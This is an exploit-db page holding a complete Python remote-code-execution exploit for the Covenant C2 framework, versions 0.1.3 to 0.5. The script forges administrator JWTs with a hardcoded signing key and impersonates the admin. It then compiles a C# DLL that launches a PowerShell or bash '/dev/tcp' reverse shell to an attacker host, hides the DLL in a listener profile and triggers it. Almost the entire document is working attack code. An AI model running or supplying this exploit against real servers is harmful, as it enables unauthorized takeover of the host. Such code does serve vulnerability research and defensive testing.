Covenant v0.5 – Remote Code Execution (RCE)

  • 作者: xThaz
    日期: 2023-03-30
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/51141/
  • # Exploit Title: Covenant v0.5 - Remote Code Execution (RCE)
    # Exploit Author: xThaz
    # Author website: https://xthaz.fr/
    # Date: 2022-09-11
    # Vendor Homepage: https://cobbr.io/Covenant.html
    # Software Link: https://github.com/cobbr/Covenant
    # Version: v0.1.3 - v0.5
    # Tested on: Windows 11 compiled covenant (Windows defender disabled), Linux covenant docker
    
    # Vulnerability
    ## Discoverer: coastal
    ## Date: 2020-07-13
    ## Discoverer website: https://blog.null.farm
    ## References:
    ## - https://blog.null.farm/hunting-the-hunters
    ## - https://github.com/Zeop-CyberSec/covenant_rce/blob/master/covenant_jwt_rce.rb
    
    #!/usr/bin/env python3
    # encoding: utf-8
    
    
    import jwt# pip3 install PyJWT
    import json
    import warnings
    import base64
    import re
    import random
    import argparse
    
    from requests.packages.urllib3.exceptions import InsecureRequestWarning
    from Crypto.Hash import HMAC, SHA256# pip3 install pycryptodome
    from Crypto.Util.Padding import pad
    from Crypto.Cipher import AES
    from requests import request# pip3 install requests
    from subprocess import run
    from pwn import remote, context# pip3 install pwntools
    from os import remove, urandom
    from shutil import which
    from urllib.parse import urlparse
    from pathlib import Path
    from time import time
    
    
    def check_requirements():
        """Abort the script unless the Mono C# compiler ``mcs`` is on PATH.

        Prints installation instructions and exits with status -1 when
        ``shutil.which("mcs")`` finds nothing; otherwise returns ``None``.
        """
        if which("mcs") is not None:
            return

        print("Please install the mono framework in order to compile the payload.")
        print("https://www.mono-project.com/download/stable/")
        exit(-1)
    
    
    def random_hex(length):
        """Return a string of ``length`` random lowercase hexadecimal digits.

        Digits are drawn one at a time with ``random.choice``.
        """
        hex_digits = "0123456789abcdef"
        picked = [random.choice(hex_digits) for _ in range(length)]
        return "".join(picked)
    
    
    def request_api(method, token, route, body=""):
        """Send an authenticated JSON request to the target's REST API.

        :param method: HTTP verb handed to ``requests.request``.
        :param token: JWT placed in the ``Authorization: Bearer`` header.
        :param route: path appended to ``{args.target}/api/``.
        :param body: object serialised as the JSON request body.
        :return: the ``requests`` response object.

        Certificate verification is disabled, and the matching
        ``InsecureRequestWarning`` is silenced on every call.
        """
        warnings.simplefilter('ignore', InsecureRequestWarning)

        # `args` is the module-level argparse namespace set by the script entry point.
        url = f"{args.target}/api/{route}"
        auth_headers = {
            "Authorization": f"Bearer {token}",
            "Content-Type": "application/json",
        }
        return request(method, url, json=body, headers=auth_headers, verify=False)
    
    
    def craft_jwt(username, userid=None):
        """Build an HS256-signed JWT carrying the User and Administrator roles.

        :param username: value stored in the ``sub`` claim.
        :param userid: value stored in the ``nameidentifier`` claim. When
            omitted, a fresh random GUID-shaped id (8-4-4-4-12 hex digits) is
            generated on every call.
        :return: the encoded token as ``str``.

        The token expires 360 seconds after creation.
        """
        # The id must be generated here rather than in the signature: a default
        # expression is evaluated once at definition time, so every call would
        # otherwise reuse the same "random" id.
        if userid is None:
            userid = "-".join(random_hex(size) for size in (8, 4, 4, 4, 12))

        secret_key = '%cYA;YK,lxEFw[&P{2HwZ6Axr,{e&3o_}_P%NX+(q&0Ln^#hhft9gTdm\'q%1ugAvfq6rC'

        payload_data = {
            "sub": username,
            "jti": "925f74ca-fc8c-27c6-24be-566b11ab6585",
            "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier": userid,
            "http://schemas.microsoft.com/ws/2008/06/identity/claims/role": [
                "User",
                "Administrator"
            ],
            "exp": int(time()) + 360,
            "iss": "Covenant",
            "aud": "Covenant"
        }

        token = jwt.encode(payload_data, secret_key, algorithm='HS256')
        # PyJWT < 2.0 returns bytes; normalise so f"Bearer {token}" does not
        # render as "Bearer b'...'".
        if isinstance(token, bytes):
            token = token.decode()
        return token
    
    
    def get_id_admin(token, json_roles):
        """Resolve the username and id of a user holding the Administrator role.

        :param token: JWT used for the ``users/roles`` and ``users`` API calls.
        :param json_roles: iterable of role dicts with ``name`` and ``id`` keys.
        :return: tuple ``(username_admin, id_admin_user)``.

        Each of the three lookups takes the first match; if any finds nothing,
        an error is printed and the script exits with status -1.
        """
        not_found = object()  # sentinel, so a legitimately falsy id still counts as found

        # 1. Role id of the "Administrator" role.
        id_admin = next(
            (role["id"] for role in json_roles if role["name"] == "Administrator"),
            not_found,
        )
        if id_admin is not_found:
            print("\t[!] Did not found admin group id, quitting !")
            exit(-1)
        print(f"\t[*] Found the admin group id : {id_admin}")

        # 2. Id of the first user mapped to that role.
        json_users_roles = request_api("get", token, "users/roles").json()
        id_admin_user = next(
            (link["userId"] for link in json_users_roles if link["roleId"] == id_admin),
            not_found,
        )
        if id_admin_user is not_found:
            print("\t[!] Did not found admin id, quitting !")
            exit(-1)
        print(f"\t[*] Found the admin user id : {id_admin_user}")

        # 3. Username belonging to that user id.
        json_users = request_api("get", token, "users").json()
        username_admin = next(
            (user["userName"] for user in json_users if user["id"] == id_admin_user),
            not_found,
        )
        if username_admin is not_found:
            print("\t[!] Did not found admin username, quitting !")
            exit(-1)
        print(f"\t[*] Found the admin username : {username_admin}")
        return username_admin, id_admin_user
    
    
    def compile_payload():
        """Compile the C# payload library with ``mcs`` and return it base64-encoded.

        Reads ``args.os``, ``args.lhost`` and ``args.lport`` from the
        module-level argparse namespace to pick and fill the command passed to
        ``Process.Start``.

        :return: base64 text of the compiled ``.dll``.

        Exits with status -1 when the compiler returns a non-zero code. The
        temporary ``.cs`` and ``.dll`` files are removed on every exit path,
        including compilation failure.
        """
        if args.os == "windows":
            payload = '"powershell.exe", "-nop -c \\"$client = New-Object System.Net.Sockets.TCPClient(\'' + args.lhost + '\',' + args.lport + ');$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \'PS \' + (pwd).Path + \'> \';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\\""'
        else:
            payload = '"bash", "-c \\"exec bash -i &>/dev/tcp/' + args.lhost + '/' + args.lport + ' <&1\\""'

        dll = """using System;
    using System.Reflection;
    
    namespace ExampleDLL{
    public class Class1{
    public Class1(){
    }
    
    public void Main(string[] args){
    System.Diagnostics.Process.Start(""" + payload + """);
    }
    }
    }
    """

        temp_dll_path = f"/tmp/{random_hex(8)}"
        source_file = Path(f"{temp_dll_path}.cs")
        library_file = Path(f"{temp_dll_path}.dll")

        try:
            source_file.write_bytes(dll.encode())
            print(f"\t[*] Writing payload in {temp_dll_path}.cs")

            compilo_path = which("mcs")
            compilation = run([compilo_path, temp_dll_path + ".cs", "-t:library"])
            if compilation.returncode:
                print("\t[!] Error when compiling DLL, quitting !")
                exit(-1)
            print(f"\t[*] Successfully compiled the DLL in {temp_dll_path}.dll")

            dll_encoded = base64.b64encode(library_file.read_bytes()).decode()
        finally:
            # Runs on SystemExit too, so a failed compilation no longer leaves
            # the generated source behind in /tmp.
            for leftover in (source_file, library_file):
                if leftover.exists():
                    remove(leftover)

        print(f"\t[*] Removed {temp_dll_path}.cs and {temp_dll_path}.dll")
        return dll_encoded
    
    
    def generate_wrapper(dll_encoded):
        """Return the C# ``MessageTransform`` class source embedding ``dll_encoded``.

        :param dll_encoded: base64 text spliced into the ``assemblyBase64``
            string literal of the generated source.
        :return: the complete C# source as ``str``.
        """
        # Source text up to and including the opening quote of the base64 literal.
        prologue = """public static class MessageTransform {
    public static string Transform(byte[] bytes) {
    try {
    string assemblyBase64 = \""""

        # Source text from the closing quote of the base64 literal onwards.
        epilogue = """\";
    var assemblyBytes = System.Convert.FromBase64String(assemblyBase64);
    var assembly = System.Reflection.Assembly.Load(assemblyBytes);
    foreach (var type in assembly.GetTypes()) {
    object instance = System.Activator.CreateInstance(type);
    object[] args = new object[] { new string[] { \"\" } };
    try {
    type.GetMethod(\"Main\").Invoke(instance, args);
    }
    catch {}
    }
    }
    catch {}
    return System.Convert.ToBase64String(bytes);
    }
    
    public static byte[] Invert(string str) {
    return System.Convert.FromBase64String(str);
    }
    }"""

        return prologue + dll_encoded + epilogue
    
    
    def upload_profile(token, wrapper):
        """Create an HTTP listener profile whose ``messageTransform`` is ``wrapper``.

        :param token: JWT used for the ``profiles/http`` POST.
        :param wrapper: C# source stored in the profile's ``messageTransform`` field.
        :return: the ``id`` field of the API response.

        Exits with status -1 when the API response is not OK.
        """
        user_agent = (
            'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 '
            'Safari/537.36'
        )
        request_headers = [
            {'name': 'User-Agent', 'value': user_agent},
            {'name': 'Cookie', 'value': 'ASPSESSIONID={GUID}; SESSIONID=1552332971750'},
        ]
        response_headers = [
            {'name': 'Server', 'value': 'Microsoft-IIS/7.5'},
        ]

        body = {
            'httpUrls': [
                '/en-us/index.html',
                '/en-us/docs.html',
                '/en-us/test.html',
            ],
            'httpRequestHeaders': request_headers,
            'httpResponseHeaders': response_headers,
            'httpPostRequest': 'i=a19ea23062db990386a3a478cb89d52e&data={DATA}&session=75db-99b1-25fe4e9afbe58696-320bea73',
            'httpGetResponse': '{DATA}',
            'httpPostResponse': '{DATA}',
            'id': 0,
            'name': random_hex(8),
            'description': '',
            'type': 'HTTP',
            'messageTransform': wrapper,
        }

        response = request_api("post", token, "profiles/http", body)
        if not response.ok:
            print("\t[!] Failed to create the listener profile, quitting !")
            exit(-1)

        profile_id = response.json().get('id')
        print(f"\t[*] Profile created with id {profile_id}")
        print("\t[*] Successfully created the listener profile")
        return profile_id
    
    
    def generate_valid_listener_port(impersonate_token, tries=0):
        """Pick a random port in 8000-8250 that no existing listener binds.

        :param impersonate_token: JWT used to list the existing listeners.
        :param tries: number of attempts already consumed; at most 10 attempts
            are made in total.
        :return: a port number absent from every listener's ``bindPort``.

        Exits with status -1 once 10 attempts have been used up.

        The previous recursive implementation dropped the result of the retry
        (missing ``return``) and yielded ``None`` whenever the first candidate
        was taken; a loop makes every successful attempt return its port.
        """
        max_tries = 10

        if tries < max_tries:
            # The set of bound ports does not change between attempts, so fetch it once.
            listeners = request_api("get", impersonate_token, "listeners").json()
            port_used = {listener["bindPort"] for listener in listeners}

            for _ in range(tries, max_tries):
                port = random.randint(8000, 8250)  # TO BE EDITED WITH YOUR TARGET LISTENER PORT
                if port not in port_used:
                    print(f"\t[*] Port {port} seems free")
                    return port
                print(f"\t[!] Port {port} is already taken by another listener, retrying !")

        print("\t[!] Tried 10 times to generate a listener port but failed, quitting !")
        exit(-1)
    
    
    def get_id_listener_type(impersonate_token, listener_name):
        """Look up the id of the listener type called ``listener_name``.

        :param impersonate_token: JWT used for the ``listeners/types`` GET.
        :param listener_name: value compared against each type's ``name``.
        :return: the ``id`` of the first matching type; ``None`` (implicitly)
            when no type matches.

        Exits with status -1 when the API response is not OK.
        """
        response = request_api("get", impersonate_token, "listeners/types")
        if not response.ok:
            print("\t[!] Failed to get the listener type, quitting !")
            exit(-1)

        for candidate in response.json():
            if candidate["name"] != listener_name:
                continue
            type_id = candidate["id"]
            print(f"\t[*] Found id {type_id} for listener {listener_name}")
            return candidate["id"]
    
    
    def generate_listener(impersonate_token, profile_id):
        """Create an active HTTP listener bound to 0.0.0.0 on a free port.

        :param impersonate_token: JWT used for every API call.
        :param profile_id: id of the listener profile to attach.
        :return: tuple ``(listener_id, listener_port)``.

        Exits with status -1 when the API response is not OK.
        """
        any_address = "0.0.0.0"
        listener_port = generate_valid_listener_port(impersonate_token)
        listener_name = random_hex(8)

        data = {
            'useSSL': False,
            'urls': [f"http://0.0.0.0:{listener_port}"],
            'id': 0,
            'name': listener_name,
            'bindAddress': any_address,
            'bindPort': listener_port,
            'connectAddresses': [any_address],
            'connectPort': listener_port,
            'profileId': profile_id,
            'listenerTypeId': get_id_listener_type(impersonate_token, "HTTP"),
            'status': 'Active',
        }

        response = request_api("post", impersonate_token, "listeners/http", data)
        if not response.ok:
            print("\t[!] Failed to create the listener, quitting !")
            exit(-1)

        print("\t[*] Successfully created the listener")
        return response.json().get("id"), listener_port
    
    
    def create_grunt(impersonate_token, data):
        """Request a binary launcher and return its stager source code.

        :param impersonate_token: JWT used for the ``launchers/binary`` calls.
        :param data: launcher configuration sent as the JSON body.
        :return: the non-empty ``stagerCode`` string from the API.

        A PUT is tried first; a POST is tried only if the PUT returned an empty
        ``stagerCode``. Exits with status -1 when both come back empty.
        """
        for verb in ("put", "post"):
            stager_code = request_api(verb, impersonate_token, "launchers/binary", data).json()["stagerCode"]
            if stager_code != "":
                print("\t[*] Successfully created the grunt payload")
                return stager_code

        print("\t[!] Failed to create the grunt payload, quitting !")
        exit(-1)
    
    
    def get_grunt_config(impersonate_token, listener_id):
        """Generate a launcher and extract its AES key and GUID prefix.

        :param impersonate_token: JWT used to create the launcher.
        :param listener_id: id of the listener the launcher is tied to.
        :return: tuple ``(aes_key, guid_prefix)``, both taken from the stager
            source with regular expressions.

        Exits with status -1 when either value cannot be found.
        """
        launcher_settings = {
            'id': 0,
            'listenerId': listener_id,
            'implantTemplateId': 1,
            'name': 'Binary',
            'description': 'Uses a generated .NET Framework binary to launch a Grunt.',
            'type': 'binary',
            'dotNetVersion': 'Net35',
            'runtimeIdentifier': 'win_x64',
            'validateCert': True,
            'useCertPinning': True,
            'smbPipeName': 'string',
            'delay': 0,
            'jitterPercent': 0,
            'connectAttempts': 0,
            'launcherString': 'GruntHTTP.exe',
            'outputKind': 'consoleApplication',
            'compressStager': False,
        }
        stager_code = create_grunt(impersonate_token, launcher_settings)

        key_match = re.search(r'FromBase64String\(@\"(.[A-Za-z0-9+\/=]{40,50}?)\"\);', stager_code)
        guid_match = re.search(r'aGUID = @"(.{10}[0-9a-f]?)";', stager_code)
        if key_match is None or guid_match is None:
            print("\t[!] Failed to retrieve the grunt configuration, quitting !")
            exit(-1)

        aes_key, guid_prefix = key_match.group(1), guid_match.group(1)
        print(f"\t[*] Found the grunt configuration {[aes_key, guid_prefix]}")
        return aes_key, guid_prefix
    
    
    def aes256_cbc_encrypt(key, message):
        """Encrypt ``message`` with AES-CBC and sign the ciphertext with HMAC-SHA256.

        :param key: base64-encoded key, used for both the cipher and the HMAC.
        :param message: text to encrypt; it is encoded and padded to 16-byte blocks.
        :return: tuple ``(encrypted, iv_bytes, signature)`` of raw bytes.

        A fresh 16-byte IV is drawn from ``os.urandom`` on every call. The HMAC
        covers the ciphertext only, not the IV.
        """
        iv_bytes = urandom(16)
        raw_key = base64.b64decode(key)
        padded_plaintext = pad(message.encode(), 16)

        encrypted = AES.new(raw_key, AES.MODE_CBC, iv_bytes).encrypt(padded_plaintext)
        signature = HMAC.new(raw_key, msg=encrypted, digestmod=SHA256).digest()

        return encrypted, iv_bytes, signature
    
    
    def trigger_exploit(listener_port, aes_key, guid):
        """Send an encrypted message to the listener so the profile transform runs.

        :param listener_port: port of the listener created earlier.
        :param aes_key: base64 AES key extracted from the stager.
        :param guid: GUID placed in the envelope and in the session cookie.

        The request is sent with a ``Cookie`` header first and retried once
        with ``Cookies`` if the first attempt is not answered with 200 OK.
        Only prints the outcome; returns ``None``.
        """
        message = "<RSAKeyValue><Modulus>tqwoOYfwOkdfax+Er6P3leoKE/w5wWYgmb/riTpSSWCA6T2JklWrPtf9z3s/k0wIi5pX3jWeC5RV5Y/E23jQXPfBB9jW95pIqxwhZ1wC2UOVA8eSCvqbTpqmvTuFPat8ek5piS/QQPSZG98vLsfJ2jQT6XywRZ5JgAZjaqmwUk/lhbUedizVAnYnVqcR4fPEJj2ZVPIzerzIFfGWQrSEbfnjp4F8Y6DjNSTburjFgP0YdXQ9S7qCJ983vM11LfyZiGf97/wFIzXf7pl7CsA8nmQP8t46h8b5hCikXl1waEQLEW+tHRIso+7nBv7ciJ5WgizSAYfXfePlw59xp4UMFQ==</Modulus><Exponent>AQAB</Exponent></RSAKeyValue>"

        ciphered, iv, signature = aes256_cbc_encrypt(aes_key, message)
        envelope = {
            "GUID": guid,
            "Type": 0,
            "Meta": '',
            "IV": base64.b64encode(iv).decode(),
            "EncryptedMessage": base64.b64encode(ciphered).decode(),
            "HMAC": base64.b64encode(signature).decode(),
        }

        encoded_envelope = base64.urlsafe_b64encode(json.dumps(envelope).encode("utf-8")).decode()
        payload = (
            "i=a19ea23062db990386a3a478cb89d52e&data="
            + encoded_envelope
            + "&session=75db-99b1-25fe4e9afbe58696-320bea73"
        )

        if send_exploit(listener_port, "Cookie", guid, payload):
            print("\t[*] Exploit succeeded, check listener")
            return

        print("\t[!] Exploit failed, retrying")
        if send_exploit(listener_port, "Cookies", guid, payload):
            print("\t[*] Exploit succeeded, check listener")
            return

        print("\t[!] Exploit failed, quitting")
    
    
    def send_exploit(listener_port, header_cookie, guid, payload):
        """POST ``payload`` to the listener over a raw socket.

        :param listener_port: TCP port of the listener on ``IP_TARGET``.
        :param header_cookie: name of the header carrying the session cookie.
        :param guid: GUID placed in the ``ASPSESSIONID`` cookie value.
        :param payload: form-encoded request body.
        :return: ``True`` if the response contains ``HTTP/1.1 200 OK``,
            ``False`` otherwise.

        ``IP_TARGET`` is the module-level host name set by the script entry point.
        """
        context.log_level = 'error'

        # Join the lines with explicit CRLFs instead of relying on a
        # triple-quoted literal: any indentation of the source file would
        # otherwise end up in front of every header line.
        request_lines = [
            "POST /en-us/test.html HTTP/1.1",
            f"Host: {IP_TARGET}:{listener_port}",
            "User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36",
            f"{header_cookie}: ASPSESSIONID={guid}; SESSIONID=1552332971750",
            "Content-Type: application/x-www-form-urlencoded",
            f"Content-Length: {len(payload)}",
            "",
            payload,
        ]
        # The trailing "\n" keeps the bytes on the wire identical to the
        # previous literal, which ended with a newline after the body.
        request = ("\r\n".join(request_lines) + "\n").encode()

        sock = remote(IP_TARGET, listener_port)
        try:
            sock.sendline(request)
            # errors="replace": only the status line matters, so a stray
            # non-UTF-8 byte in the response must not abort the run.
            response = sock.recv().decode(errors="replace")
        finally:
            # Close the connection even when sending or receiving raises.
            sock.close()

        return "HTTP/1.1 200 OK" in response
    
    if __name__ == "__main__":
        # The payload cannot be built without the C# compiler, so check first.
        check_requirements()

        parser = argparse.ArgumentParser()
        parser.add_argument(
            "target",
            help="URL where the Covenant is hosted, example : https://127.0.0.1:7443",
        )
        parser.add_argument(
            "os",
            help="Operating System of the target",
            choices=["windows", "linux"],
        )
        parser.add_argument(
            "lhost",
            help="IP of the machine that will receive the reverse shell",
        )
        parser.add_argument(
            "lport",
            help="Port of the machine that will receive the reverse shell",
        )

        # `args` and `IP_TARGET` are read as module-level globals by
        # request_api, compile_payload and send_exploit; their names must not change.
        args = parser.parse_args()
        IP_TARGET = urlparse(args.target).hostname

        print("[*] Getting the admin info")
        # A token for an arbitrary username is enough to enumerate roles and users.
        bootstrap_token = craft_jwt("xThaz")
        role_list = request_api("get", bootstrap_token, "roles").json()
        admin_username, admin_id = get_id_admin(bootstrap_token, role_list)
        impersonate_token = craft_jwt(admin_username, admin_id)
        print(f"\t[*] Impersonated {[admin_username]} with the id {[admin_id]}")

        print("[*] Generating payload")
        dll_encoded = compile_payload()
        wrapper = generate_wrapper(dll_encoded)

        print("[*] Uploading malicious listener profile")
        profile_id = upload_profile(impersonate_token, wrapper)

        print("[*] Generating listener")
        listener_id, listener_port = generate_listener(impersonate_token, profile_id)

        print("[*] Triggering the exploit")
        aes_key, guid_prefix = get_grunt_config(impersonate_token, listener_id)
        trigger_exploit(listener_port, aes_key, f"{guid_prefix}{random_hex(10)}")